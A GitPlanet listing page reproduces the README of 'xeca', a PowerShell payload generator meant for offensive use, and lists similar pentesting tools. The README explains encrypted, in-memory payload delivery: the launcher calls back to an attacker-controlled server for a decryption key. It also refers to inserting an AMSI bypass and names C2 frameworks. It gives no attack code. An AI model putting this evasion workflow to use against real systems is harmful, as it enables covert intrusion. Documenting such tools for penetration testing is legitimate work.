GitPlanet

Cheap and reliable Node.js hosting starts at $3/month, and $1/month static HTML hosting

Created with love in Canada, visit hostnodejs.com today

Feel like to post an Ad? Learn Details
All Projects → postrequest → xeca

postrequest / xeca

Licence: GPL-3.0 license
PowerShell payload generator

Programming Languages

powershell
5483 projects
rust
11053 projects

Labels

pentesting-windowspenetration-testingpentestingctfpayloadctf-toolspayload-generatorpayload-generationpentesting-tools

Projects that are alternatives of or similar to xeca

Print My Shell
Python script wrote to automate the process of generating various reverse shells.
Stars: ✭ 140 (+35.92%)
Mutual labels:  penetration-testing, ctf, ctf-tools
Jwtxploiter
A tool to test security of json web token
Stars: ✭ 130 (+26.21%)
Mutual labels:  penetration-testing, ctf, ctf-tools
Lscript
The LAZY script will make your life easier, and of course faster.
Stars: ✭ 3,056 (+2866.99%)
Mutual labels:  penetration-testing, payload, payload-generator
Flask Unsign
Command line tool to fetch, decode, brute-force and craft session cookies of a Flask application by guessing secret keys.
Stars: ✭ 90 (-12.62%)
Mutual labels:  penetration-testing, ctf, ctf-tools
Stegcracker
Steganography brute-force utility to uncover hidden data inside files
Stars: ✭ 396 (+284.47%)
Mutual labels:  penetration-testing, ctf, ctf-tools
Stegextract
Detect hidden files and text in images
Stars: ✭ 79 (-23.3%)
Mutual labels:  penetration-testing, ctf
Pentest Guide
Penetration tests guide based on OWASP including test cases, resources and examples.
Stars: ✭ 1,316 (+1177.67%)
Mutual labels:  penetration-testing, payload
Scilla
🏴‍☠️ Information Gathering tool 🏴‍☠️ DNS / Subdomains / Ports / Directories enumeration
Stars: ✭ 116 (+12.62%)
Mutual labels:  penetration-testing, ctf-tools
Ezxss
ezXSS is an easy way for penetration testers and bug bounty hunters to test (blind) Cross Site Scripting.
Stars: ✭ 1,022 (+892.23%)
Mutual labels:  penetration-testing, payload
Awesome Hacking Resources
A collection of hacking / penetration testing resources to make you better!
Stars: ✭ 11,466 (+11032.04%)
Mutual labels:  penetration-testing, ctf
OSCP-Prep
Contained is all my reference material for my OSCP preparation. Designed to be a one stop shop for code, guides, command syntax, and high level strategy. One simple clone and you have access to some of the most popular tools used for pentesting.
Stars: ✭ 33 (-67.96%)
Mutual labels:  pentesting-windows, pentesting-tools
Fwdsh3ll
Forward shell generation framework
Stars: ✭ 62 (-39.81%)
Mutual labels:  penetration-testing, ctf-tools
Discover
Custom bash scripts used to automate various penetration testing tasks including recon, scanning, parsing, and creating malicious payloads and listeners with Metasploit.
Stars: ✭ 2,548 (+2373.79%)
Mutual labels:  penetration-testing, payload-generator
Awesome Hacking
A collection of various awesome lists for hackers, pentesters and security researchers
Stars: ✭ 48,038 (+46538.83%)
Mutual labels:  pentesting-windows, penetration-testing
Owasp Workshop Android Pentest
Learning Penetration Testing of Android Applications
Stars: ✭ 60 (-41.75%)
Mutual labels:  penetration-testing, ctf
Knary
A simple HTTP(S) and DNS Canary bot with Slack/Discord/MS Teams & Pushover support
Stars: ✭ 187 (+81.55%)
Mutual labels:  penetration-testing, ctf-tools
Lnkup
Generates malicious LNK file payloads for data exfiltration
Stars: ✭ 205 (+99.03%)
Mutual labels:  penetration-testing, payload
Brutal
Payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy . Brutal is a toolkit to quickly create various payload,powershell attack , virus attack and launch listener for a Human Interface Device ( Payload Teensy )
Stars: ✭ 678 (+558.25%)
Mutual labels:  penetration-testing, payload
Vhostscan
A virtual host scanner that performs reverse lookups, can be used with pivot tools, detect catch-all scenarios, work around wildcards, aliases and dynamic default pages.
Stars: ✭ 767 (+644.66%)
Mutual labels:  penetration-testing, ctf-tools
Oscp Pentest Methodologies
备考 OSCP 的各种干货资料/渗透测试干货资料
Stars: ✭ 166 (+61.17%)
Mutual labels:  penetration-testing, ctf
View All Similar Projects ➔

xeca

xeca is a project that creates encrypted PowerShell payloads for offensive purposes.

Creating position independent shellcode from DLL files is also possible.

Note: Please place your custom AMSI bypass in src/assets/amsi-bypass.ps1.

Table of Contents

Install

Firstly ensure that rust is installed, then build the project with the following command:

cargo build

How It Works

  1. Identify and encrypt the payload. Load encrypted payload into a powershell script and save to a file named "launch.txt"
  2. The key to decrypt the payload is saved to a file named "safe.txt"
  3. Execute "launch.txt" on a remote host
    • The script will call back to the attacker defined web server to retrieve the decryption key "safe.txt"
    • Decrypt the payload in memory
    • Execute the intended payload in memory

Mitigations

If users must have access to programs such as powershell.exe, consider minimising security risks with Just Enough Administration and PowerShell Logging. Application control policies can be deployed via a whitelisting technology such as AppLocker.

Examples

Covenant

Covenant .NET assembly donut payload. gif

Empire

Empire PowerShell payload. gif

Merlin

Merlin DLL payload. gif

Sliver

Sliver Shellcode payload. gif

Acknowledgements

This tool would not be possible without the sharing of knowledge and information. Ideas, snippets and code from the following authors should be acknowledged:
@monoxgas
@H0neyBadger
@TheWover
@stephenfewer
@dismantl
@tandasat
@cobbr

License

xeca is licensed under GPLv3, some sub-components may have separate licenses. See their respective references in this project for details.

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].